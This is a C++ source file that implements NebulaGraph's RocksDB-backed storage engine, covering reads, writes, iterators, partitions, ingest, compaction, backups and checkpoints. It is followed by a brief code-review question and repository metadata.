/* Copyright (c) 2018 vesoft inc. All rights reserved. * * This source code is licensed under Apache 2.0 License, * attached with Common Clause Condition 1.0, found in the LICENSES directory. */ #include "kvstore/RocksEngine.h" #include <folly/String.h> #include <rocksdb/convenience.h> #include "common/base/Base.h" #include "common/fs/FileUtils.h" #include "common/utils/NebulaKeyUtils.h" #include "kvstore/KVStore.h" DEFINE_bool(move_files, false, "Move the SST files instead of copy when ingest into dataset"); namespace nebula { namespace kvstore { using fs::FileType; using fs::FileUtils; namespace { /*************************************** * * Implementation of WriteBatch * **************************************/ class RocksWriteBatch : public WriteBatch { private: rocksdb::WriteBatch batch_; public: RocksWriteBatch() : batch_(FLAGS_rocksdb_batch_size) {} virtual ~RocksWriteBatch() = default; nebula::cpp2::ErrorCode put(folly::StringPiece key, folly::StringPiece value) override { if (batch_.Put(toSlice(key), toSlice(value)).ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode remove(folly::StringPiece key) override { if (batch_.Delete(toSlice(key)).ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { return nebula::cpp2::ErrorCode::E_UNKNOWN; } } // Remove all keys in the range [start, end) nebula::cpp2::ErrorCode removeRange(folly::StringPiece start, folly::StringPiece end) override { if (batch_.DeleteRange(toSlice(start), toSlice(end)).ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { return nebula::cpp2::ErrorCode::E_UNKNOWN; } } rocksdb::WriteBatch* data() { return &batch_; } }; } // Anonymous namespace /*************************************** * * Implementation of WriteBatch * **************************************/ RocksEngine::RocksEngine(GraphSpaceID spaceId, int32_t vIdLen, const std::string& dataPath, const std::string& walPath, std::shared_ptr<rocksdb::MergeOperator> mergeOp, std::shared_ptr<rocksdb::CompactionFilterFactory> cfFactory, bool readonly) : KVEngine(spaceId), spaceId_(spaceId), dataPath_(folly::stringPrintf("%s/nebula/%d", dataPath.c_str(), spaceId)) { // set wal path as dataPath by default if (walPath.empty()) { walPath_ = folly::stringPrintf("%s/nebula/%d", dataPath.c_str(), spaceId); } else { walPath_ = folly::stringPrintf("%s/nebula/%d", walPath.c_str(), spaceId); } auto path = folly::stringPrintf("%s/data", dataPath_.c_str()); if (FileUtils::fileType(path.c_str()) == FileType::NOTEXIST) { if (readonly) { LOG(FATAL) << "Path " << path << " not exist"; } else { if (!FileUtils::makeDir(path)) { LOG(FATAL) << "makeDir " << path << " failed"; } } } if (FileUtils::fileType(path.c_str()) != FileType::DIRECTORY) { LOG(FATAL) << path << " is not directory"; } openBackupEngine(spaceId); rocksdb::Options options; rocksdb::DB* db = nullptr; rocksdb::Status status = initRocksdbOptions(options, spaceId, vIdLen); CHECK(status.ok()) << status.ToString(); if (mergeOp != nullptr) { options.merge_operator = mergeOp; } if (cfFactory != nullptr) { options.compaction_filter_factory = cfFactory; } if (readonly) { status = rocksdb::DB::OpenForReadOnly(options, path, &db); } else { status = rocksdb::DB::Open(options, path, &db); } CHECK(status.ok()) << status.ToString(); db_.reset(db); partsNum_ = allParts().size(); extractorLen_ = sizeof(PartitionID) + vIdLen; LOG(INFO) << "open rocksdb on " << path; backup(); } void RocksEngine::stop() { if (db_) { // Because we trigger compaction in 
WebService, we need to stop all // background work before we stop HttpServer. rocksdb::CancelAllBackgroundWork(db_.get(), true); } } std::unique_ptr<WriteBatch> RocksEngine::startBatchWrite() { return std::make_unique<RocksWriteBatch>(); } nebula::cpp2::ErrorCode RocksEngine::commitBatchWrite(std::unique_ptr<WriteBatch> batch, bool disableWAL, bool sync, bool wait) { rocksdb::WriteOptions options; options.disableWAL = disableWAL; options.sync = sync; options.no_slowdown = !wait; auto* b = static_cast<RocksWriteBatch*>(batch.get()); rocksdb::Status status = db_->Write(options, b->data()); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else if (!wait && status.IsIncomplete()) { return nebula::cpp2::ErrorCode::E_WRITE_STALLED; } LOG(ERROR) << "Write into rocksdb failed because of " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } nebula::cpp2::ErrorCode RocksEngine::get(const std::string& key, std::string* value) { rocksdb::ReadOptions options; rocksdb::Status status = db_->Get(options, rocksdb::Slice(key), value); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else if (status.IsNotFound()) { VLOG(3) << "Get: " << key << " Not Found"; return nebula::cpp2::ErrorCode::E_KEY_NOT_FOUND; } else { VLOG(3) << "Get Failed: " << key << " " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } std::vector<Status> RocksEngine::multiGet(const std::vector<std::string>& keys, std::vector<std::string>* values) { rocksdb::ReadOptions options; std::vector<rocksdb::Slice> slices; for (size_t index = 0; index < keys.size(); index++) { slices.emplace_back(keys[index]); } auto status = db_->MultiGet(options, slices, values); std::vector<Status> ret; std::transform(status.begin(), status.end(), std::back_inserter(ret), [](const auto& s) { if (s.ok()) { return Status::OK(); } else if (s.IsNotFound()) { return Status::KeyNotFound(); } else { return Status::Error(); } }); return ret; } nebula::cpp2::ErrorCode RocksEngine::range(const std::string& start, const std::string& end, std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; options.total_order_seek = FLAGS_enable_rocksdb_prefix_filtering; rocksdb::Iterator* iter = db_->NewIterator(options); if (iter) { iter->Seek(rocksdb::Slice(start)); } storageIter->reset(new RocksRangeIter(iter, start, end)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::prefix(const std::string& prefix, std::unique_ptr<KVIterator>* storageIter) { // In fact, we don't need to check prefix.size() >= extractorLen_, which is caller's duty to make // sure the prefix bloom filter exists. But this is quite error-proning, so we do a check here. 
if (FLAGS_enable_rocksdb_prefix_filtering && prefix.size() >= extractorLen_) { return prefixWithExtractor(prefix, storageIter); } else { return prefixWithoutExtractor(prefix, storageIter); } } nebula::cpp2::ErrorCode RocksEngine::prefixWithExtractor(const std::string& prefix, std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; options.prefix_same_as_start = true; rocksdb::Iterator* iter = db_->NewIterator(options); if (iter) { iter->Seek(rocksdb::Slice(prefix)); } storageIter->reset(new RocksPrefixIter(iter, prefix)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::prefixWithoutExtractor( const std::string& prefix, std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; // prefix_same_as_start is false by default options.total_order_seek = FLAGS_enable_rocksdb_prefix_filtering; rocksdb::Iterator* iter = db_->NewIterator(options); if (iter) { iter->Seek(rocksdb::Slice(prefix)); } storageIter->reset(new RocksPrefixIter(iter, prefix)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::rangeWithPrefix(const std::string& start, const std::string& prefix, std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; // prefix_same_as_start is false by default options.total_order_seek = FLAGS_enable_rocksdb_prefix_filtering; rocksdb::Iterator* iter = db_->NewIterator(options); if (iter) { iter->Seek(rocksdb::Slice(start)); } storageIter->reset(new RocksPrefixIter(iter, prefix)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::scan(std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; options.total_order_seek = true; rocksdb::Iterator* iter = db_->NewIterator(options); iter->SeekToFirst(); storageIter->reset(new RocksCommonIter(iter)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::put(std::string key, std::string value) { rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; rocksdb::Status status = db_->Put(options, key, value); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "Put Failed: " << key << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::multiPut(std::vector<KV> keyValues) { rocksdb::WriteBatch updates(FLAGS_rocksdb_batch_size); for (size_t i = 0; i < keyValues.size(); i++) { updates.Put(keyValues[i].first, keyValues[i].second); } rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; rocksdb::Status status = db_->Write(options, &updates); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "MultiPut Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::remove(const std::string& key) { rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; auto status = db_->Delete(options, key); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "Remove Failed: " << key << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::multiRemove(std::vector<std::string> keys) { rocksdb::WriteBatch deletes(FLAGS_rocksdb_batch_size); for (size_t i = 0; i < keys.size(); i++) { deletes.Delete(keys[i]); } rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; rocksdb::Status status = db_->Write(options, &deletes); if (status.ok()) { return 
nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "MultiRemove Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::removeRange(const std::string& start, const std::string& end) { rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; auto status = db_->DeleteRange(options, db_->DefaultColumnFamily(), start, end); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "RemoveRange Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } std::string RocksEngine::partKey(PartitionID partId) { return NebulaKeyUtils::systemPartKey(partId); } void RocksEngine::addPart(PartitionID partId) { auto ret = put(partKey(partId), ""); if (ret == nebula::cpp2::ErrorCode::SUCCEEDED) { partsNum_++; CHECK_GE(partsNum_, 0); } } void RocksEngine::removePart(PartitionID partId) { rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; std::vector<std::string> sysKeysToDelete; sysKeysToDelete.emplace_back(partKey(partId)); sysKeysToDelete.emplace_back(NebulaKeyUtils::systemCommitKey(partId)); auto code = multiRemove(sysKeysToDelete); if (code == nebula::cpp2::ErrorCode::SUCCEEDED) { partsNum_--; CHECK_GE(partsNum_, 0); } } std::vector<PartitionID> RocksEngine::allParts() { std::unique_ptr<KVIterator> iter; std::vector<PartitionID> parts; static const std::string prefixStr = NebulaKeyUtils::systemPrefix(); auto retCode = this->prefix(prefixStr, &iter); if (nebula::cpp2::ErrorCode::SUCCEEDED != retCode) { return parts; } while (iter->valid()) { auto key = iter->key(); CHECK_EQ(key.size(), sizeof(PartitionID) + sizeof(NebulaSystemKeyType)); PartitionID partId = *reinterpret_cast<const PartitionID*>(key.data()); if (!NebulaKeyUtils::isSystemPart(key)) { VLOG(3) << "Skip: " << std::bitset<32>(partId); iter->next(); continue; } partId = partId >> 8; parts.emplace_back(partId); iter->next(); } return parts; } int32_t RocksEngine::totalPartsNum() { return partsNum_; } nebula::cpp2::ErrorCode RocksEngine::ingest(const std::vector<std::string>& files, bool verifyFileChecksum) { rocksdb::IngestExternalFileOptions options; options.move_files = FLAGS_move_files; options.verify_file_checksum = verifyFileChecksum; rocksdb::Status status = db_->IngestExternalFile(files, options); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "Ingest Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::setOption(const std::string& configKey, const std::string& configValue) { std::unordered_map<std::string, std::string> configOptions = {{configKey, configValue}}; rocksdb::Status status = db_->SetOptions(configOptions); if (status.ok()) { LOG(INFO) << "SetOption Succeeded: " << configKey << ":" << configValue; return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "SetOption Failed: " << configKey << ":" << configValue; return nebula::cpp2::ErrorCode::E_INVALID_PARM; } } nebula::cpp2::ErrorCode RocksEngine::setDBOption(const std::string& configKey, const std::string& configValue) { std::unordered_map<std::string, std::string> configOptions = {{configKey, configValue}}; rocksdb::Status status = db_->SetDBOptions(configOptions); if (status.ok()) { LOG(INFO) << "SetDBOption Succeeded: " << configKey << ":" << configValue; return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "SetDBOption Failed: " << configKey << ":" << configValue; return 
nebula::cpp2::ErrorCode::E_INVALID_PARM; } } ErrorOr<nebula::cpp2::ErrorCode, std::string> RocksEngine::getProperty( const std::string& property) { std::string value; if (!db_->GetProperty(property, &value)) { return nebula::cpp2::ErrorCode::E_INVALID_PARM; } else { return value; } } nebula::cpp2::ErrorCode RocksEngine::compact() { rocksdb::CompactRangeOptions options; options.change_level = FLAGS_rocksdb_compact_change_level; options.target_level = FLAGS_rocksdb_compact_target_level; rocksdb::Status status = db_->CompactRange(options, nullptr, nullptr); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "CompactAll Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::flush() { rocksdb::FlushOptions options; rocksdb::Status status = db_->Flush(options); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "Flush Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::backup() { if (!backupDb_) { return nebula::cpp2::ErrorCode::SUCCEEDED; } LOG(INFO) << "begin to backup space " << spaceId_ << " on path " << backupPath_; bool flushBeforeBackup = true; auto status = backupDb_->CreateNewBackup(db_.get(), flushBeforeBackup); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "backup failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_BACKUP_FAILED; } } void RocksEngine::openBackupEngine(GraphSpaceID spaceId) { // If backup dir is not empty, set backup related options if (FLAGS_rocksdb_table_format == "PlainTable" && !FLAGS_rocksdb_backup_dir.empty()) { backupPath_ = folly::stringPrintf("%s/rocksdb_backup/%d", FLAGS_rocksdb_backup_dir.c_str(), spaceId); if (FileUtils::fileType(backupPath_.c_str()) == FileType::NOTEXIST) { if (!FileUtils::makeDir(backupPath_)) { LOG(FATAL) << "makeDir " << backupPath_ << " failed"; } } rocksdb::BackupEngine* backupDb; rocksdb::BackupableDBOptions backupOptions(backupPath_); backupOptions.backup_log_files = false; auto status = rocksdb::BackupEngine::Open(rocksdb::Env::Default(), backupOptions, &backupDb); CHECK(status.ok()) << status.ToString(); backupDb_.reset(backupDb); LOG(INFO) << "open plain table backup engine on " << backupPath_; std::string dataPath = folly::stringPrintf("%s/data", dataPath_.c_str()); auto walDir = dataPath; if (!FLAGS_rocksdb_wal_dir.empty()) { walDir = folly::stringPrintf("%s/rocksdb_wal/%d", FLAGS_rocksdb_wal_dir.c_str(), spaceId); } else { LOG(WARNING) << "rocksdb wal is stored with data"; } rocksdb::RestoreOptions restoreOptions; restoreOptions.keep_log_files = true; status = backupDb_->RestoreDBFromLatestBackup(dataPath, walDir, restoreOptions); LOG(INFO) << "try to restore from backup path " << backupPath_; if (status.IsNotFound()) { LOG(WARNING) << "no valid backup found"; return; } else if (!status.ok()) { LOG(FATAL) << status.ToString(); } LOG(INFO) << "restore from latest backup succesfully" << ", backup path " << backupPath_ << ", wal path " << walDir << ", data path " << dataPath; } } nebula::cpp2::ErrorCode RocksEngine::createCheckpoint(const std::string& name) { LOG(INFO) << "Begin checkpoint : " << dataPath_; /* * The default checkpoint directory structure is : * |--FLAGS_data_path * |----nebula * |------space1 * |--------data * |--------wal * |--------checkpoints * |----------snapshot1 * |------------data * |------------wal * |----------snapshot2 * |----------snapshot3 * */ auto 
checkpointPath = folly::stringPrintf("%s/checkpoints/%s/data", dataPath_.c_str(), name.c_str()); LOG(INFO) << "Target checkpoint path : " << checkpointPath; if (fs::FileUtils::exist(checkpointPath) && !fs::FileUtils::remove(checkpointPath.data(), true)) { LOG(ERROR) << "Remove exist dir failed of checkpoint : " << checkpointPath; return nebula::cpp2::ErrorCode::E_STORE_FAILURE; } auto parent = checkpointPath.substr(0, checkpointPath.rfind('/')); if (!FileUtils::exist(parent)) { if (!FileUtils::makeDir(parent)) { LOG(ERROR) << "Make dir " << parent << " failed"; return nebula::cpp2::ErrorCode::E_UNKNOWN; } } rocksdb::Checkpoint* checkpoint; rocksdb::Status status = rocksdb::Checkpoint::Create(db_.get(), &checkpoint); std::unique_ptr<rocksdb::Checkpoint> cp(checkpoint); if (!status.ok()) { LOG(ERROR) << "Init checkpoint Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_FAILED_TO_CHECKPOINT; } status = cp->CreateCheckpoint(checkpointPath, 0); if (!status.ok()) { LOG(ERROR) << "Create checkpoint Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_FAILED_TO_CHECKPOINT; } return nebula::cpp2::ErrorCode::SUCCEEDED; } ErrorOr<nebula::cpp2::ErrorCode, std::string> RocksEngine::backupTable( const std::string& name, const std::string& tablePrefix, std::function<bool(const folly::StringPiece& key)> filter) { auto backupPath = folly::stringPrintf( "%s/checkpoints/%s/%s.sst", dataPath_.c_str(), name.c_str(), tablePrefix.c_str()); VLOG(3) << "Start writing the sst file with table (" << tablePrefix << ") to file: " << backupPath; auto parent = backupPath.substr(0, backupPath.rfind('/')); if (!FileUtils::exist(parent)) { if (!FileUtils::makeDir(parent)) { LOG(ERROR) << "Make dir " << parent << " failed"; return nebula::cpp2::ErrorCode::E_BACKUP_FAILED; } } rocksdb::Options options; options.file_checksum_gen_factory = rocksdb::GetFileChecksumGenCrc32cFactory(); rocksdb::SstFileWriter sstFileWriter(rocksdb::EnvOptions(), options); std::unique_ptr<KVIterator> iter; auto ret = prefix(tablePrefix, &iter); if (ret != nebula::cpp2::ErrorCode::SUCCEEDED) { return nebula::cpp2::ErrorCode::E_BACKUP_EMPTY_TABLE; } if (!iter->valid()) { return nebula::cpp2::ErrorCode::E_BACKUP_EMPTY_TABLE; } auto s = sstFileWriter.Open(backupPath); if (!s.ok()) { LOG(ERROR) << "BackupTable failed, path: " << backupPath << ", error: " << s.ToString(); return nebula::cpp2::ErrorCode::E_BACKUP_TABLE_FAILED; } while (iter->valid()) { if (filter && filter(iter->key())) { iter->next(); continue; } s = sstFileWriter.Put(iter->key().toString(), iter->val().toString()); if (!s.ok()) { LOG(ERROR) << "BackupTable failed, path: " << backupPath << ", error: " << s.ToString(); sstFileWriter.Finish(); return nebula::cpp2::ErrorCode::E_BACKUP_TABLE_FAILED; } iter->next(); } s = sstFileWriter.Finish(); if (!s.ok()) { LOG(WARNING) << "Failure to insert data when backupTable, " << backupPath << ", error: " << s.ToString(); return nebula::cpp2::ErrorCode::E_BACKUP_EMPTY_TABLE; } if (sstFileWriter.FileSize() == 0) { return nebula::cpp2::ErrorCode::E_BACKUP_EMPTY_TABLE; } if (backupPath[0] == '/') { return backupPath; } auto result = nebula::fs::FileUtils::realPath(backupPath.c_str()); if (!result.ok()) { return nebula::cpp2::ErrorCode::E_BACKUP_TABLE_FAILED; } return result.value(); } } // namespace kvstore } // namespace nebula
1
31,659
Why does this modification avoid the crash?
vesoft-inc-nebula
cpp
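For context on the question above: in the file shown, allParts() scans via prefix(), and prefix() compares the key length against extractorLen_, so with the pre-patch ordering allParts() ran before extractorLen_ was assigned. The snippet below is a stripped-down sketch of that ordering dependency only; it is not the engine code, and the member default and sizes are placeholders.

```cpp
#include <cstddef>
#include <iostream>
#include <string>

// Minimal stand-in for the constructor ordering discussed in the patch above.
// In the real RocksEngine, allParts() calls prefix(), and prefix() consults
// extractorLen_ to choose between the prefix-extractor and full-scan paths.
struct EngineSketch {
  std::size_t extractorLen_ = 0;  // defaulted here only to keep the sketch well-defined

  bool usesExtractor(const std::string& prefix) const {
    // Mirrors the check in RocksEngine::prefix(): it only behaves as intended
    // once extractorLen_ has been assigned.
    return prefix.size() >= extractorLen_;
  }

  void initWrongOrder(std::size_t vIdLen) {
    // Reads extractorLen_ before it is set (the pre-patch ordering).
    std::cout << "wrong order: " << usesExtractor("0123") << "\n";
    extractorLen_ = sizeof(int) + vIdLen;
  }

  void initRightOrder(std::size_t vIdLen) {
    // Sets extractorLen_ first (the post-patch ordering), then scans.
    extractorLen_ = sizeof(int) + vIdLen;
    std::cout << "right order: " << usesExtractor("0123") << "\n";
  }
};

int main() {
  EngineSketch{}.initWrongOrder(8);
  EngineSketch{}.initRightOrder(8);
}
```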
@@ -1,8 +1,7 @@
 module RedirectIfDisabled
   def redirect_if_disabled
-    account = current_user
-    return unless account && account.access.disabled?
-    request.env[:clearance].sign_out
-    redirect_to disabled_account_url(account)
+    return unless @account && @account.access.disabled?
+    request.env[:clearance].sign_out if @account.id == current_user.id
+    redirect_to disabled_account_url(@account)
   end
 end
1
module RedirectIfDisabled
  def redirect_if_disabled
    account = current_user
    return unless account && account.access.disabled?
    request.env[:clearance].sign_out
    redirect_to disabled_account_url(account)
  end
end
1
9,180
This looks good -- signing out the user if the current user is disabled
blackducksoftware-ohloh-ui
rb
@@ -47,13 +47,13 @@ class Selection {
      */
     this.selectedByCorner = false;
     /**
-     * The collection of the selection layer levels where the whole row was selected using the row header.
+     * The collection of the selection layer levels where the whole row was selected using the row header or the corner header.
      *
      * @type {Set.<number>}
      */
     this.selectedByRowHeader = new Set();
     /**
-     * The collection of the selection layer levels where the whole column was selected using the column header.
+     * The collection of the selection layer levels where the whole column was selected using the column header or the corner header.
      *
      * @type {Set.<number>}
      */
1
import Highlight, { AREA_TYPE, HEADER_TYPE, CELL_TYPE } from './highlight/highlight'; import SelectionRange from './range'; import { CellCoords } from './../3rdparty/walkontable/src'; import { isPressedCtrlKey } from './../utils/keyStateObserver'; import { createObjectPropListener, mixin } from './../helpers/object'; import { isUndefined } from './../helpers/mixed'; import { arrayEach } from './../helpers/array'; import localHooks from './../mixins/localHooks'; import Transformation from './transformation'; import { detectSelectionType, isValidCoord, normalizeSelectionFactory, SELECTION_TYPE_EMPTY, SELECTION_TYPE_UNRECOGNIZED, } from './utils'; import { toSingleLine } from './../helpers/templateLiteralTag'; /** * @class Selection * @util */ class Selection { constructor(settings, tableProps) { /** * Handsontable settings instance. * * @type {GridSettings} */ this.settings = settings; /** * An additional object with dynamically defined properties which describes table state. * * @type {object} */ this.tableProps = tableProps; /** * The flag which determines if the selection is in progress. * * @type {boolean} */ this.inProgress = false; /** * The flag indicates that selection was performed by clicking the corner overlay. * * @type {boolean} */ this.selectedByCorner = false; /** * The collection of the selection layer levels where the whole row was selected using the row header. * * @type {Set.<number>} */ this.selectedByRowHeader = new Set(); /** * The collection of the selection layer levels where the whole column was selected using the column header. * * @type {Set.<number>} */ this.selectedByColumnHeader = new Set(); /** * Selection data layer (handle visual coordinates). * * @type {SelectionRange} */ this.selectedRange = new SelectionRange(); /** * Visualization layer. * * @type {Highlight} */ this.highlight = new Highlight({ headerClassName: settings.currentHeaderClassName, activeHeaderClassName: settings.activeHeaderClassName, rowClassName: settings.currentRowClassName, columnClassName: settings.currentColClassName, disableHighlight: this.settings.disableVisualSelection, cellCornerVisible: (...args) => this.isCellCornerVisible(...args), areaCornerVisible: (...args) => this.isAreaCornerVisible(...args), visualToRenderableCoords: coords => this.tableProps.visualToRenderableCoords(coords), renderableToVisualCoords: coords => this.tableProps.renderableToVisualCoords(coords), }); /** * The module for modifying coordinates. 
* * @type {Transformation} */ this.transformation = new Transformation(this.selectedRange, { countRows: () => this.tableProps.countRowsTranslated(), countCols: () => this.tableProps.countColsTranslated(), visualToRenderableCoords: coords => this.tableProps.visualToRenderableCoords(coords), renderableToVisualCoords: coords => this.tableProps.renderableToVisualCoords(coords), fixedRowsBottom: () => settings.fixedRowsBottom, minSpareRows: () => settings.minSpareRows, minSpareCols: () => settings.minSpareCols, autoWrapRow: () => settings.autoWrapRow, autoWrapCol: () => settings.autoWrapCol, }); this.transformation.addLocalHook('beforeTransformStart', (...args) => this.runLocalHooks('beforeModifyTransformStart', ...args)); this.transformation.addLocalHook('afterTransformStart', (...args) => this.runLocalHooks('afterModifyTransformStart', ...args)); this.transformation.addLocalHook('beforeTransformEnd', (...args) => this.runLocalHooks('beforeModifyTransformEnd', ...args)); this.transformation.addLocalHook('afterTransformEnd', (...args) => this.runLocalHooks('afterModifyTransformEnd', ...args)); this.transformation.addLocalHook('insertRowRequire', (...args) => this.runLocalHooks('insertRowRequire', ...args)); this.transformation.addLocalHook('insertColRequire', (...args) => this.runLocalHooks('insertColRequire', ...args)); } /** * Get data layer for current selection. * * @returns {SelectionRange} */ getSelectedRange() { return this.selectedRange; } /** * Indicate that selection process began. It sets internaly `.inProgress` property to `true`. */ begin() { this.inProgress = true; } /** * Indicate that selection process finished. It sets internaly `.inProgress` property to `false`. */ finish() { this.runLocalHooks('afterSelectionFinished', Array.from(this.selectedRange)); this.inProgress = false; } /** * Check if the process of selecting the cell/cells is in progress. * * @returns {boolean} */ isInProgress() { return this.inProgress; } /** * Starts selection range on given coordinate object. * * @param {CellCoords} coords Visual coords. * @param {boolean} [multipleSelection] If `true`, selection will be worked in 'multiple' mode. This option works * only when 'selectionMode' is set as 'multiple'. If the argument is not defined * the default trigger will be used (isPressedCtrlKey() helper). * @param {boolean} [fragment=false] If `true`, the selection will be treated as a partial selection where the * `setRangeEnd` method won't be called on every `setRangeStart` call. */ setRangeStart(coords, multipleSelection, fragment = false) { const isMultipleMode = this.settings.selectionMode === 'multiple'; const isMultipleSelection = isUndefined(multipleSelection) ? isPressedCtrlKey() : multipleSelection; const isRowNegative = coords.row < 0; const isColumnNegative = coords.col < 0; const selectedByCorner = isRowNegative && isColumnNegative; // We change coordinates of selection to start from 0 (we don't include headers in a selection). if (isRowNegative) { coords.row = 0; } if (isColumnNegative) { coords.col = 0; } this.selectedByCorner = selectedByCorner; this.runLocalHooks(`beforeSetRangeStart${fragment ? 
'Only' : ''}`, coords); if (!isMultipleMode || (isMultipleMode && !isMultipleSelection && isUndefined(multipleSelection))) { this.selectedRange.clear(); } this.selectedRange.add(coords); if (this.getLayerLevel() === 0) { this.selectedByRowHeader.clear(); this.selectedByColumnHeader.clear(); } if (!selectedByCorner && isColumnNegative) { this.selectedByRowHeader.add(this.getLayerLevel()); } if (!selectedByCorner && isRowNegative) { this.selectedByColumnHeader.add(this.getLayerLevel()); } if (!fragment) { this.setRangeEnd(coords); } } /** * Starts selection range on given coordinate object. * * @param {CellCoords} coords Visual coords. * @param {boolean} [multipleSelection] If `true`, selection will be worked in 'multiple' mode. This option works * only when 'selectionMode' is set as 'multiple'. If the argument is not defined * the default trigger will be used (isPressedCtrlKey() helper). */ setRangeStartOnly(coords, multipleSelection) { this.setRangeStart(coords, multipleSelection, true); } /** * Ends selection range on given coordinate object. * * @param {CellCoords} coords Visual coords. */ setRangeEnd(coords) { if (this.selectedRange.isEmpty()) { return; } this.runLocalHooks('beforeSetRangeEnd', coords); this.begin(); const cellRange = this.selectedRange.current(); if (this.settings.selectionMode !== 'single') { cellRange.setTo(new CellCoords(coords.row, coords.col)); } // Set up current selection. this.highlight.getCell().clear(); if (this.highlight.isEnabledFor(CELL_TYPE)) { this.highlight.getCell() .add(this.selectedRange.current().highlight) .commit() .adjustCoordinates(cellRange); } const layerLevel = this.getLayerLevel(); // If the next layer level is lower than previous then clear all area and header highlights. This is the // indication that the new selection is performing. if (layerLevel < this.highlight.layerLevel) { arrayEach(this.highlight.getAreas(), highlight => void highlight.clear()); arrayEach(this.highlight.getHeaders(), highlight => void highlight.clear()); arrayEach(this.highlight.getActiveHeaders(), highlight => void highlight.clear()); } this.highlight.useLayerLevel(layerLevel); const areaHighlight = this.highlight.createOrGetArea(); const headerHighlight = this.highlight.createOrGetHeader(); const activeHeaderHighlight = this.highlight.createOrGetActiveHeader(); areaHighlight.clear(); headerHighlight.clear(); activeHeaderHighlight.clear(); if (this.highlight.isEnabledFor(AREA_TYPE) && (this.isMultiple() || layerLevel >= 1)) { areaHighlight .add(cellRange.from) .add(cellRange.to) .commit(); if (layerLevel === 1) { // For single cell selection in the same layer, we do not create area selection to prevent blue background. // When non-consecutive selection is performed we have to add that missing area selection to the previous layer // based on previous coordinates. It only occurs when the previous selection wasn't select multiple cells. 
this.highlight .useLayerLevel(layerLevel - 1) .createOrGetArea() .add(this.selectedRange.previous().from) .commit(); this.highlight.useLayerLevel(layerLevel); } } if (this.highlight.isEnabledFor(HEADER_TYPE)) { if (this.settings.selectionMode === 'single') { headerHighlight.add(cellRange.highlight).commit(); } else { headerHighlight .add(cellRange.from) .add(cellRange.to) .commit(); } } if (this.isSelectedByRowHeader()) { const isRowSelected = this.tableProps.countCols() === cellRange.getWidth(); // Make sure that the whole row is selected (in case where selectionMode is set to 'single') if (isRowSelected) { activeHeaderHighlight .add(new CellCoords(cellRange.from.row, -1)) .add(new CellCoords(cellRange.to.row, -1)) .commit(); } } if (this.isSelectedByColumnHeader()) { const isColumnSelected = this.tableProps.countRows() === cellRange.getHeight(); // Make sure that the whole column is selected (in case where selectionMode is set to 'single') if (isColumnSelected) { activeHeaderHighlight .add(new CellCoords(-1, cellRange.from.col)) .add(new CellCoords(-1, cellRange.to.col)) .commit(); } } this.runLocalHooks('afterSetRangeEnd', coords); } /** * Returns information if we have a multiselection. This method check multiselection only on the latest layer of * the selection. * * @returns {boolean} */ isMultiple() { const isMultipleListener = createObjectPropListener(!this.selectedRange.current().isSingle()); 